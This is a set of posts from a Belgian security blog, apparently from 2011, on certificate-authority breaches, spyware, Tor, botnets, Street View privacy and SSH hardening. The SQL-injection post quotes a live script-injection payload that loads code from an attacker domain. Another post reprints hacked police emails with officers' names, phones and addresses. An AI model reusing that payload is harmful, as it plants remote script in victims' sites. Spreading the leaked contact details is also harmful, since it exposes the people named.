• the best for 2012 and a better health for me now

    the last weeks I have been absent from this blogs but sometimes in your life - and this is a volunteer project since 7 years for which I haven't earned a cent nor did it advance my career (more the opposite because it angered too many people :) ) - this is not to say that I am not open to interesting proposals if they can live with someone who speaks his minds and tell things as they might happen (and sometimes do :))

    but for the last weeks I have been sick just like last year and I had to keep my own health 'under control' and 'under observation' and be sure that I went to the doctor on time and had the right medication on time because of my asthma a simple bronchitis can develop more easily into pneunomia and that can have greater consequences for me if it isn't found in time than for a 'normal' person (being in intensive care in the clinic for example - which I nearly was last year)

    but it is just as with security, you observe, you control, you keep the facts clean and without interpretation, you record the evolution and you eliminate and you learn the pattern. It is even as with security because here the attacks are hidden behind the continuous state of asthma and colds and so you have to learn to look behind the fog. 

    with everything we have learnt (the doctor and me) after the two december attacks we are better prepared for next year and as we were this year earlier in finding the right cause, we will maybe next year be even earlier.

    I will be back in a week or so when the medication is not so strong because now I am quite quickly tired and I seem to hate working before a computer because it tires me and I can't keep myself concentrated long enough.

    so this blog ain't dead, but just 'on sickness leave'

    in the meantime I just want to say thanks to all the people who have in the main time updated their SSL certificates because I had announced in some back-channels that I would publish listings of bad ssl certificates or absent once for big banks and online services

    I will get back on that in januari as with many other things in the wing

    one thing must be clear for 2012 - the time of niceties and compliance and waiting and understanding is over - it is 2012 you had enough time to clear up your mess and there is enough technology and knowledge on the market - even at affordable prices to secure your infrastructure and information.

    for the rest have a nice party tonight

  • how kpn-ssl can go down or survive

    The last time KPN stopped the production of SSL certificates in november 2011 it took them 5 days to resume production. The fact was that someone discovered that one of their pages of their webservers was defaced since 4 years. After an investigation by KPMG they decided that everything was clean and that they could resume business.

    Well, that seemed too quickly.

    Now someone has decided that enough is enough and has decided that they take everything online and that they will only communicate when they are 100% sure. At one side that is a good decision at the other end communicating nothing will kill their business before it can restart because we are talking about virtual trust.

    Now it seems that there are two problems.

    First a pure internal problem. Most of the business of diginotar of the official government has been transferred very quickly to KPN (keeping it between the good old dutch network) and that business also includes some very new markets (smartcards) for which they didn't seem to have all the necessary expertise and procedures yet. So they made a lot of mistakes in the beginning and when it became clear that mistakes were being made, they decided to audit every one of them again and revoke all the certificates (mostly for smartcards) that contained mistakes.

    This indicates that there is a management and a procedural verification problem in the internal process. It will be necessary for KPN to respond to that and to take whatever action and make whatever investment needed to adjust that (while keeping the controls as stringent as should be). 

    Secondly there is an external security problem. If you leave your external admin controlpage on an external page you are already taking a big risk (because they could and should be working on a vpn connection to an internal management platform) but when there is no password (maybe there was one but the first hacker changed it - a possibility that has to be taken into account) there are three enormous problemn of credibility.

    First it shows that there is no permanent security auditing and controls, automatic and by really paranoid security people (trust no one except what you see with your own eyes). Otherwise such mistakes would have been seen by either of them. (use metasploit for automatic scanning)

    Secondly it shows that there is no permanent automatic and human monitoring and analyzing of the logs. If that would have been the case, the second hacker would have been discovered the moment he opened several confidential files that were stored on the database server but that a normal admin wouldn't have opened. Also he saw that a first hacker left some footprints on the server but he discovered something the monitors didn't see.

    Thirdly it shows that the securitypolicy inside the network is not enough paranoïd for these times and haven't even been upgraded considerably after the attacks on the other ssl providers (and the news by the diginotar hacker that two other ssl providers were hacked inside out by him without naming them). If you read this and you are a dutch certificateprovider and you have been offline for 5 days because of some old hack that has been discovered that you didn't know about, you should go nuts. And if you see that diginotar goes broke, you should go through the roof because you should know that if you are one of the two others the chances are great that you can be the next one and that you also can go broke.  Maybe someone inside the company is mad as hell now  and is mobilizing every penny he still has to get this act together as fast as possible... but it maybe too late.

    If the KPN ssl business wants to survive they have to do as Globalsign the following three things

    1. Get online again and communicate about every step you have taken and every step you will be taking

    2. Get external auditors in and give them all the powers that need to be and let them only respond to the CEO and no one else. It is the business itself which is on the line and there should be no discussion about what to do next.

    3. Secure part by part of the business and go from the inside to the outside. Every part of the inside business that has been secured (or transferred to a secure environment) should go back to normal procedure (which means that they become active and that they deliver service - even if all passwords, rights, access, trusts, links and auditing have been reviewed from scratch or are revoked and are only re-activated after the re-securing process has been finished). The secured parts should be totally seperated from the part of the infrastructure that has not been re-secured (also in backup, networklinks and so on).

    This is why leasing contracts for hardware or cloudcontracts for immediate new infrastructure are so important as standby contracts on which you can act swiftly.

    Every installation that would cost too much money to resecure or of which you can never be sure again because it was too deeply compromised, should be simply thrown away. The data (without the rights, code and access) should be migrated to an enterily fresh hardware platform.

    There should be a strict isolation between online public information and internal management, between business assets and managment tools for external information, between confidential or secret information and public information

    this is how globalsign did it

    all the other paths are risky and may FAIL

    just a last question : who decided in the firm that php was a platform that you could use without having permanent controls, checks and updates - becasuse free and cheap software costs much more in security and maintenance. I like PHP-MYSQL but it not cheap in maintenance if you want to keep it safe and updated. You should use because it is flexible, not because it looks cheap and easy (just like any other open source tool)

  • another dutch ssl certificate provider in trouble

    okay you have to sit down and forget everything you have ever believed about internetsecurity and to remember that this a service that should be at the highest level of security because its certificates create the trust on the internet that is used by all businesses and egov and all the other e-hyped things

    so we are talking about a service that you should trust completely because it gives you the certificates that all your users will trust to be sure that they are on your server and not one in Russia for example

    this is not a small firm, this is a subsidiary of KPN one of the biggest dutch ISP's and an official provider of official certificates for the dutch governement, even more after the downfall of Diginotar

    It was already hacked once - somebody placed an online DDOS tool on one of its servers - in november 2011 but it went online again after a 'positive report' from KPMG (which proves that security auditing has to be done in real life and not on paper, globally and not locally and permanently not only after an incident)

    Now a hacker contacted the online webzine webwereld.nl to say that it wasn't difficult to penetrate their internal systems - even those with confidential information

    (are you sitting down) okay   their PHP admin webpage didn't have a password   (yes, read that aload to believe it)

    and the internal administrative password was 'easy to find'

    but the guy also said that he saw that he wasn't the first one who had penetrated the network and that he saw confidential information about confidential networks for governments and businesses (as you now also create certificates for servers on internal networks with confidential information) and which pc's they used with sometimes unsecure methods to manage these certificates (good for targeted attacks)

    so the server went offline

    it is also clear that since september the number of certificates that have been revoked by the firm has risen dramatically. it is strange to see that when you have to do such a thing that you don't ask yourself if there is something wrong and you that they didn't do some audits to find out

    virtual trust is absolute or relative and with certificates it has to be absolute

    the problem is that if it would be the case that thousands of false certificates have been made or that someone had access to the systems that the trust in all their certificates would diminish and eventually the trust in their capability of providing such services would disappear and that thousands of certificates (of which many by official institutions who fled from Diginotar) would be in jeopardy and that this  is not even a dutch decision, it is a decision that the other operators on the internet may take independently (Microsoft, firefox, google etc...)

    even if they think that these guys aren't worth the trust because they don't know how to handle their business as it should be (they discovered a 4 year hack in november, fixed it and than forgot that the main door to their database was open and that all the rest wasn't too secure)

    some firms like Globalsign take such situations as an opportunity to review every detail of their operational and virtual business and they can restart

    if you can't do that (and put your money where your PR is) than you may lose that trust quickly

    because you can fool the people once (in november) but not every month....

  • iqcarrier (spy)ware : after the dust has fallen

    You could say that there is now a moment to get through the articles and debates and interest ourselves in a few concrete points on which further work is possible or necessary

    1. Logging and monitoring is necessary but one has to articulate clearly what one is sending from your computer or networked device to the operator or technical teams. One cannot expect a network operator to upgrade its network without having access to metrics. Those general metrics should be general and anonimized so that they can't be used for forensics.

    2. You can't have a helpdesk that can answer any possible technical question without having the possibility to get very detailed information about what happens on or with the networked device. This should be given by an already installed software and should be able to send test messages and other information - as long as the analysis is necessary - and should be deleted afterwards.

    3. Some jobs will need to have networked devices that are are recording everything so that in case of a court order all the information can be looked through that is linked to that case. This is the case for american traders for example. But these people now that this is the case (and the most intelligent won't leave any digital footprints any way)

    So even if we are comprohensive, some rules have been broken

    1. If there is a discussion about your software or your methods or procedures you should accept the debate and respond to it. It is clear from this incident that the firm is playing with its future by not doing so. Not only have they first tried to silence the blogger, but they only didn't respond in detail to the allegations, even if others have shown that with some technical analysis of the case, many of the presumptions have been proven to be too general and too negative.

    2. THe user of the networked device is never informed of the presence of this tool and what it actually does and where one can see what information is transferred and what is actually done with it and how it is managed. 

    3. The user has no choice but to accept the tool(s) and the information. On a computer a software company or the OS (Microsoft in this case) asks you if they may receive information if the program crashes or encounters a problem and you have the possibility to opt out.

    4. Even if the software now doesn't really control and record every stroke you type (speaking seems gold) there is no guarantee that this software could be adapted in our countries or by other agencies (with or without the knowledge of its user(s)

    5. It doesn't seem that there has been any consultation with any privacy organization or commissioner and that the general technical and legal terminology isn't enough to guarantee the privacy of each users under all circumstances.

     Some practical points to keep in mind

    1. Android is an open platform and a provider or phone-reseller may do with it whatever it wishes. Maybe it is time to seperate android installations from network or phone resellers so that you could chose to install a never version or one that is privacyproof (from a cd). Maybe Android should also oblige adapted versions to detail online what was changed and why. 

    This is the case for Apple devices up to Ios5 (which won't have this software) by  turning off "Diagnostics and Usage" in "Settings."

    2. The network device was during its analysis in debugger state which is different from the normal state of the device during the normal operation and use. Any device in debugger state will record everything that is happening on and with the device and send or record it as detailed as possible.

    3. Some of the information was not recorded by the software of Iqcarrier but by Android debugger tools which makes it necessary to index and control all the tools on the platforms that are recording user data.

    4. The software is an integrated part of some Android installations and removing it or installing an alternative ROM is in the present state dangerous for the stability of your device or software and could open other security problems. Secretive organisations and institutions will have to develop their own Android (I suppose NSA would be capable of doing this) that can guarantee or full logging or no logging.

    5. This particular software isn't installed on Belgian phones or networks as far as we know but more research will be needed.

  • if you want links to free books, get them here before they also disappear

    scribd.com has decided that my 40.000 links to books organized and my 1000 documents were somewhat infringing some-one and so they threw me (again) away (with all the work)

    but that is the last time ....... no more uploading to scribd anymore

    except if they would have the same rules for every-one (inclusive their OWN staff) and a copyright monitoring software that is decent and would discover actually something worthwhile quick enough....

    if you want to find the listings you can find them here with this Google


    for securitybooks (links that is) this is one

    http://www.scribd.com/collections/2801760/security2?page=39 (and before and afterwards)

    other collections (to help you search were)

    business - business2 - business3 - ecology - art - political - political2 - terrorism - international - international2 - fun and practical - fun and practical2 - history - history2 - filosophy - filosophy2 - security - security2 - science

    in all around 40.000 links

    this is also the reason why scribd.com will never be the youtube for video's

    if youtube used the same discriminatory and stupid tactics it wouldn't have the userbase it has

    and to make their hypocritical attitude total, they aren't at all interested in promoting original stuff on their website or have any strategy to do so - a website that is a total mess with a tag system that is confusing

    content is king, the rest is stupidity (and they are throwing it away by the thousands)

  • what a political impact a stupid tweet can make

    Filip Dewinter
    Di Rupo premier! No way! Dan verhuis ik naar Namibie...

    Retweeted by and 100+ others

    so our belgian politicians have started tweeting throughout the day, trying to say things the smart way in 160 characters and looking sometimes very silly indeed

    this extreme right wing politician said a year and a half ago that he would go and live in Namibia if Elio Di Rupo became prime minister in Belgium

    Elio is prime minister in Belgium

    so,  now what ?

    think before you tweet :)

  • #belsecparty we are giving .be admins a bit more time (friday)

    we have contacted the cert that we will be publishing information about essential websites without ssl login and websites with ssl login where the configuration was sometimes so bad that it is better not to have ssl at all


    we have giving access to the cert to the first staple of collections of sites

    as promised belsec 2.0 will be publishing more stuff like that from now on

    keeping it under the carpet has done no one any good


    remember there is an European directive coming our way with data breach fines

    so just setting it back won't be sufficient any more

  • exclusive : publication on pastebin of 2000 Tor admins (also Belgians) and advice

    there is nothing illegal with using tor but it does indicate that you are taking some special measures to defend your privacy and there is a lot of totally illegal stuf on Tor and Tor is mainly being used by activists, spies and criminals - beside all the normal people who use it (but it is an element that would be mentioned in your profile)

    Tor is being maintained by volunteers who set up freely servers as entrance points or as sorties. There has always been a lot of discussion about the control and security of those servers and what the maintainers of those servers are doing with all that information. In the beginning of Wikileaks there was a lot of discussion or debate about the source of all that material and some people thought that it was legitimate or stolen material that went trough TOR.

    Tor is a system - network that is under surveillance and many people are all the time busy with trying to hack or crack it (not for criminal but for espionage reasons) and that is why people should update all the time their Tor software (which is not the case if you look at the list). Maybe Tor should set an update control of the software before anyone can connect to the network so it is sure that no users would enter with vulnerable software and compromise the privacy and security of others.

    around  2000 people are listed here as they are probably users or admins of an entry or sortie point with an IP address and an emailaddress or because they have left somewhere information

    I hope there are no servers of your firm or organisation in it or that are also used for other services .....

    so the best advice would be to

    * use a fake or exclusive emailadres for your TOR connections as contact

    * never go in with your own ip address use a proxy or change your IP address immediately afterwards with your ISP

    this list is even more interesting for targeted attacks, because if you can't break the system, you can break nearly always the security of the individual installations and information


    but by looking a bit further there seems to be some-one or a crew searching and researching everything they can find about TOR and every part of their installation and configuration (is an attack in preparation ?) and publishing the data on pastebin (and some with some time-limit)

    time will tell - but you are warned

    by the way - intelligence and security-agencies should stop gazing at twitter all the time, the real stuff is happening in the paste-site world now - instantly before anyone on twitter even knows about it

  • for those who think that you can find a technical solution to copyright protection

    Researchers from the Ruhr University of Bochum’s Secure Hardware Group in Germany have cracked the copy protection system used by HDMI ports: Intel’s HDCP, or High-bandwidth Digital Content Protection. In addition to HDMI, HDCP is used to encrypt video signals transferred via DVI, DisplayPort and other connectors.


    “In 2010, an HDCP master key, which is intended to form the secret core element of the encryption system, appeared briefly on a website,” reads the official press release. “In response, the manufacturer Intel announced that HDCP still represented an effective protection component for digital entertainment, as the production of an HDCP-compatible chip using this master key would be highly complex and expensive.”


    Seemingly taking that as a challenge, the team accomplished the “inexpensive” man-in-the-middle attack by using Digilent’s Atlys Spartan-6 FPGA development board. It features a Xilinx Spartan-6 LX45 FPGA (field programmable gate array) in a 324-pin BGA package, two HDMI video input ports, two HDMI video output ports, a 10/100/1000 Ethernet jack, a RS232 serial port and more.

    You need a new business model, not a new encryption, DRM or whatever snooper you can think off.

  • Microsoft and botnets alerting : some thoughts

    Microsoft is the one firm in the world investing the most resources in tackling botnets and using any means to disrupt their networks (including getting them in US courts)

    Botnets are a complex problem that requires a multi-faceted global solution. As such, no one entity can solve the problem alone. Microsoft believes that voluntary efforts to combat botnets must include members of the entire ecosystem. In fact, the most interesting and effective solutions will come from the partnerships between different parts of the ecosystem.


    o We emphasize the need to disrupt and ultimately prevent botnets in the future. It is important not to simply build mechanisms by which botnet infections can be cleaned up very efficiently, in perpetuity. To do this, we must disrupt the botnet business models by simultaneously raising the attackers’ costs while lowering their gains.


    o We are supportive of efforts to notify customers of infected devices, but recognize the increased possibility for fraudulent notifications. There are two key aspects to making notifications resistant to fraud and effective to end-users regardless of the form they take. First is to establish a trusted communications channel, so that users can be assured they are getting notifications from a trusted entity, and not just another attacker trying to get them to put malware on their system. Second is to explain the problem and the solution in terms the user can understand and with steps they can easily follow.


    o We believe the most effective measure end users can take to stop botnet infections before they happen is to use the most current versions of operating systems, applications and security software available to them. Our recent Security Intelligence Report shows that each successive version of Windows has a lower infection rate than its predecessor.

    but even than I still think it is up to the ISP's to block the addresses of known botnet servers and to alert by trusted channels (why not the ISP bill for example) that that person could be infected and should install an antivirus or any other securitymeasure

    and I still think that a securitypackage should come automatically with your ISP subscription (even if you would be able to chose between different products).

  • European Commission wants to

    The EC is doing what national governments seem to be failing to do, and is asking for more power to deal with offending businesses. It is looking for fines of up to five per cent of annual turnover for breaches of privacy rules, according to a draft of the Data Protection Directive to be unveiled in the new year.


    Documents seen by the Financial Times suggest that the EC's proposals will also impose mandatory notifications for all companies within 24 hours of any data breach, as the institution looks to strength citizens' privacy.


    The document contains provisions for any organisation with more than 250 employees to appoint full-time staff dedicated to data protection, a requirement that is not enforced in all EU member states

     at the privacy conference in Brussels this year the representative of the commission had a hard part defending it against the lawyers and businessmen in the audience, but that as one other person :) said

    it would make a world of difference for the securitypeople in organisations and businesses if they could say : if you don't invest enough in security (normally 7 to 10% of your ITbudget) than you will risk to pay a lot more if you would be fined and it would also cost you your image and reputation and trust because it would become public

    I think it is in the interest of any interested party to support this measure with any means posible because the lobbyists will do everything in their power to get all the teeth out of the measures and measures without teeth are meaningless.

    If those fines would be used to subsidize the Privacy commissions in the respective member countries than those would have a budget to pay firms to do real audits and fine firms where it is clear that their audits are meaningless (Diginotar for ex.). Simply waving with a report or some accreditation wouldn't be sufficient.

    It would also mean that firms and organisations would have every interest in staying out of on the online battles with antisec-anonymous as it would - in time -  lead to hacking and leaking of accounts for which they could be fined. As those attacks happen under the cover of DDOS attacks it will be in the interest of hosters and ISP's to upgrade their DDOS attacks as a commercial firm or institution shouldn't be hosted on a platform that can't defend them against DDOS attacks who would weaken their defenses and could lead to dataleakages and fines. These fines would be more expensive than the cost of hosting your sites and applications with secure and ddos-resilient infrastructure firms.

    It is also time to integrate security, privacy and performance (ddos) fully into any IT course worth that name.

    A last thought is that in Belgium we would need an ITsecurity MBA that wouldn't be just a copy of international and US norms but would be built upon the Belgian and European law, norms and infrastructure while using the international knowlegde and experience.

  • exclusive : Apple couldn't help FCCU with remote monitoring of Iphone finder

    Anonymous hacked the mailaccount of a cop who is a member of the special Occupy crackdown taskforce (as it is called) and published all its emails on torrent (and some on the web)

    it gives some credibility to the fact that Apple didn't know some intelligence services were hacking and cracking itunes and consorts to install monitor software

    this one is with a mail to our own FCCU.be

    • Oh Facebook!....  kthx for the tips :D

    • Just a thought,  I recently solved a missing (runaway) by getting Facebook login IP addresses.  The missing checked her Facebook account from her secret boyfriend’s residence.  You know that the younger generation can’t live without their social media.  Find out what your missing was in to; i.e. Facebook, MySpace, Tweeter or even email accounts.  They all store IP information.
    • Detective Jim Verlander  CFCE, CEECS
    • Baton Rouge Police Department
    • High Tech Support Unit
    • 4445 Plank Road, CIB - Annex
    • Baton Rouge, La. 70805
    • 225-389-8362 Office
    • 225-389-7865 Fax
    • jverlander@brgov.com
    • -----------------------------------------
    • How do you know the user doesn't already have it installed? Did you check the iTunes application list on their desktop machine?
    • It's possible it could already be installed and connected to their iCloud account, and if so, would be traceable. The carrier should also be able to provide location data if the device is on the network.
    • Jonathan
    • On Nov 3, 2011, at 8:02 AM, <tim.cools@fccu.be> wrote:
    • > Got my answer from Apple:
    • > ------------------------------------
    • > Dear Mr Cools,
    • > Unfortunately this is not possible. Apple has no means to remotely install and enable the 'Find my iPhone' facility.
    • > Regards, Martin Reed
    • > ------------------------------------
    • > Thx anyway.
    • > Tim COOLS
    • > Federal Judicial Police
    • > Federal Computer Crime Unit (FCCU)
    • > Notelaarsstraat 211 - 1000 Brussels, Belgium
    • > Tel +32 2 743 74 49
    • > Fax +32 2 743 74 19
    • > tim.cools@fccu.be
    • > Van: Jonathan Zdziarski [mailto:jonathan@zdziarski.com]
    • > Verzonden: donderdag 3 november 2011 12:24
    • > Onderwerp: Re: tracing an I-phone
    • > I'd think you should be able to subpoena that from Apple... As well as a subpoena to get location data from the cellular provider.
    • > Pardon teh Spellnig; Sent form my iPhone
    • > On Nov 3, 2011, at 7:14 AM, <tim.cools@fccu.be> wrote:
    • >     In a case of a missing person who has an I-phone,
    • >     Is there a possibility to trace that iphone without having the login details of the apple account of that missing person?
    • >     And without knowing that the app “find my Iphone” is installed …  
    • >     Thx, Tim  
    • >     Tim COOLs   
    • >     Federal Judicial Police
    • >     Federal Computer Crime Unit (FCCU)
    • >     Notelaarsstraat 211 - 1000 Brussels, Belgium
    • >     Tel +32 2 743 74 49
    • >     Fax +32 2 743 74 19
    • >     tim.cools@fccu.be

  • Google street view and selling your house

    so you want to sell  your house

    and people will use Google Street view to look at your house

    but what if

    * the street has been renovated (there are hundreds of km of streets who have been renovated throughout Belgium the last years because the waterinfrastructure has to be renovated and seperated at the same time)

    * you have renovated your house

    how do you let them know that the picture is old and that the street and your house is totally different from what is on the picture

    shouldn't Google put a date next to the picture just as an indication and alert

    because the watermark on the pictures says Google 2011 but that is false, it can't be 2011 because the street where I live is totally different from the street they have taken a picture from, so it can't be 2011

  • exclusive : Google Street View and your political privacy

    for some cities - of which Ostend - Google has taken the pictures a few months before an electoral campaign (I suppose it would be the one from 2010)

    while Google has undertaken enormous efforts in blurring the numberplates and the faces of people you can still find (for example in Ostend) who was a supporter of Groen because they were quite early with their campaign

    it is quite amazing that they have not thought one minute of blurring also the political or religious affliations of individual houses (and we are a democracy, imagine the same thing in Russia)

    no - you can say that it is public because you put that poster on your home - but that doesn't mean that at the time that you were hanging that poster that you would know that it would be published on the net for years to come - imagine if you sell the house and the new home-owner is member of a totally different party

    also, because the names that are coupled to the house are full of mistakes and that only on the few I know about

    so, no these things shouldn't be indexed in any way - even by Google

    game : find the Groen supporters in Ostend  :)

  • one very nice combination of spam, virus, ddos, keylogging, vishing and money mules

    The spam campaign is pretending to be legitimate e-mails from the National Automated Clearing House Association (NACHA), advising the user there was problem with the ACH transaction at their bank and it was not processed. Once they click on the link they are infected with the Zeus or Gameover malware, which is able to key log as well as steal their online banking credentials, defeating several forms of two factor authentication.


    After the accounts are compromised, the perpetrators conduct a Distributed Denial of Service (DDoS) attack on the financial institution. The belief is the DDoS is used to deflect attention from the wire transfers as well to make them unable to reverse the transactions (if found). A portion of the wire transfers (not all) are being transmitted directly to high-end jewelry stores, wherein the money mule comes to the actual store to pick up his $100K in jewels (or whatever dollar amount was wired).


    Investigation has shown the perpetrators contact the high-end jeweler requesting to purchase precious stones and high-end watches. The perpetrators advise they will wire the money to the jeweler’s account and someone will come to pick up the merchandise. The next day, a money mule arrives at the store, the jeweler confirms the money has been transferred or is listed as “pending” and releases the merchandise to the mule. Later on, the transaction is reversed or cancelled (if the financial institution caught the fraud in time) and the jeweler is out whatever jewels the money mule was able to obtain.


    so we have seen in the Anonymous campaigns that DDOS was used as a cover for break-ins and account and document stealing. Here it is used as a cover for fraud. DDOS as a cover can become a method which will have an impact on securityprocedures. You won't concentrate on the DDOS but on all the other things that are happening at the same time.

  • more ssh attacks coming - how to protect yourself

    some tips from the internet storm center

    Some Defensive Tips (Thanks Swa)


    - Never allow root to log in, no matter what: always login in as a regular user and then use su/sudo as needed.
    - Change port number: why go stand in the line of fire ?
    - Disallow password authentication (use keys)


    In addition to the above, you should also consider using TCP Wrappers with the SSH service to limit access to only those addresses that need access.


    Another application that can also help protect your SSH service is fail2ban [1], it will ban IPs that makes too many password failures. It updates firewall rules to reject the IP address.


    Have you been seeing similar activity?


    [1] http://www.fail2ban.org/wiki/index.php/Main_Page


    [2] ftp://ftp.porcupine.org/pub/security/index.html

  • the "verified by visa" scandal : simply explained for managers and dummies

    the article doesn't say that the whole process is rotten

    it doesn't find exploitable scriptable holes in the systems

    it only says that when somebody wants to declare a stolen card and wants to get its card back or be able to purchase something that that process if very flawed

    because the only information one has to fill in to get access to the purchasing power of the card

    that is NOT on the card

    is the birthday of the cardholder

    verification means something different before letting people spend money on stolen cards

  • new sql injection attack and a Belgian jobsite injected


    it mostly attacks coldfusion and other sql databases
    it is a sql error

    in Belgium there are few victims but it is a jobsite
    and a jobsite has your cv
    so it shouldn't be vulnerable at all

    1. Onderwijs

      1 dag geleden – Part-time Docent / Hoofddocent Chemie bij "></title><script src="http://lilupophilupop.com/sl.php"></script><!--Unive in Hasselt (be) 17-11-2011 ...
    2. Healthcare en Life Sciences

      Maria in Overpelt 17-11-2011. 17-11-2011. Full-time Geriater bij "></title><script src="http://lilupophilupop.com/sl.php"></script><!--Maria in Overpelt 17-11-2011 ...


  • #belsecparty documents UN report on e-waste

    just dump it in Africa U N Study on E Waste

  • #belsecparty document I have a dream

    I am happy to join with you today in what will go down in history as the greatest demonstration for freedom in the history of our nation.

    Five score years ago, a great American, in whose symbolic shadow we stand today, signed the Emancipation Proclamation. This momentous decree came as a great beacon light of hope to millions of Negro slaves who had been seared in the flames of withering injustice. It came as a joyous daybreak to end the long night of their captivity.

    But one hundred years later, the Negro still is not free. One hundred years later, the life of the Negro is still sadly crippled by the manacles of segregation and the chains of discrimination. One hundred years later, the Negro lives on a lonely island of poverty in the midst of a vast ocean of material prosperity. One hundred years later, the Negro is still languished in the corners of American society and finds himself an exile in his own land. And so we've come here today to dramatize a shameful condition.

    In a sense we've come to our nation's capital to cash a check. When the architects of our republic wrote the magnificent words of the Constitution and the Declaration of Independence, they were signing a promissory note to which every American was to fall heir. This note was a promise that all men, yes, black men as well as white men, would be guaranteed the "unalienable Rights" of "Life, Liberty and the pursuit of Happiness." It is obvious today that America has defaulted on this promissory note, insofar as her citizens of color are concerned. Instead of honoring this sacred obligation, America has given the Negro people a bad check, a check which has come back marked "insufficient funds."

    But we refuse to believe that the bank of justice is bankrupt. We refuse to believe that there are insufficient funds in the great vaults of opportunity of this nation. And so, we've come to cash this check, a check that will give us upon demand the riches of freedom and the security of justice.

    We have also come to this hallowed spot to remind America of the fierce urgency of Now. This is no time to engage in the luxury of cooling off or to take the tranquilizing drug of gradualism. Now is the time to make real the promises of democracy. Now is the time to rise from the dark and desolate valley of segregation to the sunlit path of racial justice. Now is the time to lift our nation from the quicksands of racial injustice to the solid rock of brotherhood. Now is the time to make justice a reality for all of God's children.

    It would be fatal for the nation to overlook the urgency of the moment. This sweltering summer of the Negro's legitimate discontent will not pass until there is an invigorating autumn of freedom and equality. Nineteen sixty-three is not an end, but a beginning. And those who hope that the Negro needed to blow off steam and will now be content will have a rude awakening if the nation returns to business as usual. And there will be neither rest nor tranquility in America until the Negro is granted his citizenship rights. The whirlwinds of revolt will continue to shake the foundations of our nation until the bright day of justice emerges.

    But there is something that I must say to my people, who stand on the warm threshold which leads into the palace of justice: In the process of gaining our rightful place, we must not be guilty of wrongful deeds. Let us not seek to satisfy our thirst for freedom by drinking from the cup of bitterness and hatred. We must forever conduct our struggle on the high plane of dignity and discipline. We must not allow our creative protest to degenerate into physical violence. Again and again, we must rise to the majestic heights of meeting physical force with soul force.

    The marvelous new militancy which has engulfed the Negro community must not lead us to a distrust of all white people, for many of our white brothers, as evidenced by their presence here today, have come to realize that their destiny is tied up with our destiny. And they have come to realize that their freedom is inextricably bound to our freedom.

    We cannot walk alone.

    And as we walk, we must make the pledge that we shall always march ahead.

    We cannot turn back.

    There are those who are asking the devotees of civil rights, "When will you be satisfied?" We can never be satisfied as long as the Negro is the victim of the unspeakable horrors of police brutality. We can never be satisfied as long as our bodies, heavy with the fatigue of travel, cannot gain lodging in the motels of the highways and the hotels of the cities. *We cannot be satisfied as long as the negro's basic mobility is from a smaller ghetto to a larger one. We can never be satisfied as long as our children are stripped of their self-hood and robbed of their dignity by a sign stating: "For Whites Only."* We cannot be satisfied as long as a Negro in Mississippi cannot vote and a Negro in New York believes he has nothing for which to vote. No, no, we are not satisfied, and we will not be satisfied until "justice rolls down like waters, and righteousness like a mighty stream."¹

    I am not unmindful that some of you have come here out of great trials and tribulations. Some of you have come fresh from narrow jail cells. And some of you have come from areas where your quest -- quest for freedom left you battered by the storms of persecution and staggered by the winds of police brutality. You have been the veterans of creative suffering. Continue to work with the faith that unearned suffering is redemptive. Go back to Mississippi, go back to Alabama, go back to South Carolina, go back to Georgia, go back to Louisiana, go back to the slums and ghettos of our northern cities, knowing that somehow this situation can and will be changed.

    Let us not wallow in the valley of despair, I say to you today, my friends.

    And so even though we face the difficulties of today and tomorrow, I still have a dream. It is a dream deeply rooted in the American dream.

    I have a dream that one day this nation will rise up and live out the true meaning of its creed: "We hold these truths to be self-evident, that all men are created equal."

    I have a dream that one day on the red hills of Georgia, the sons of former slaves and the sons of former slave owners will be able to sit down together at the table of brotherhood.

    I have a dream that one day even the state of Mississippi, a state sweltering with the heat of injustice, sweltering with the heat of oppression, will be transformed into an oasis of freedom and justice.

    I have a dream that my four little children will one day live in a nation where they will not be judged by the color of their skin but by the content of their character.

    I have a dream today!

    I have a dream that one day, down in Alabama, with its vicious racists, with its governor having his lips dripping with the words of "interposition" and "nullification" -- one day right there in Alabama little black boys and black girls will be able to join hands with little white boys and white girls as sisters and brothers.

    I have a dream today!

    I have a dream that one day every valley shall be exalted, and every hill and mountain shall be made low, the rough places will be made plain, and the crooked places will be made straight; "and the glory of the Lord shall be revealed and all flesh shall see it together."²

    This is our hope, and this is the faith that I go back to the South with.

    With this faith, we will be able to hew out of the mountain of despair a stone of hope. With this faith, we will be able to transform the jangling discords of our nation into a beautiful symphony of brotherhood. With this faith, we will be able to work together, to pray together, to struggle together, to go to jail together, to stand up for freedom together, knowing that we will be free one day.

    And this will be the day -- this will be the day when all of God's children will be able to sing with new meaning:

    My country 'tis of thee, sweet land of liberty, of thee I sing.

    Land where my fathers died, land of the Pilgrim's pride,

    From every mountainside, let freedom ring!

    And if America is to be a great nation, this must become true.

    And so let freedom ring from the prodigious hilltops of New Hampshire.

                    Let freedom ring from the mighty mountains of New York.

                    Let freedom ring from the heightening Alleghenies of

                    Let freedom ring from the snow-capped Rockies of Colorado.

                    Let freedom ring from the curvaceous slopes of California.

                    But not only that:

                    Let freedom ring from Stone Mountain of Georgia.

                    Let freedom ring from Lookout Mountain of Tennessee.

                    Let freedom ring from every hill and molehill of Mississippi.

    From every mountainside, let freedom ring.

    And when this happens, when we allow freedom ring, when we let it ring from every village and every hamlet, from every state and every city, we will be able to speed up that day when all of God's children, black men and white men, Jews and Gentiles, Protestants and Catholics, will be able to join hands and sing in the words of the old Negro spiritual:

                    Free at last! Free at last!

                    Thank God Almighty, we are free at last!³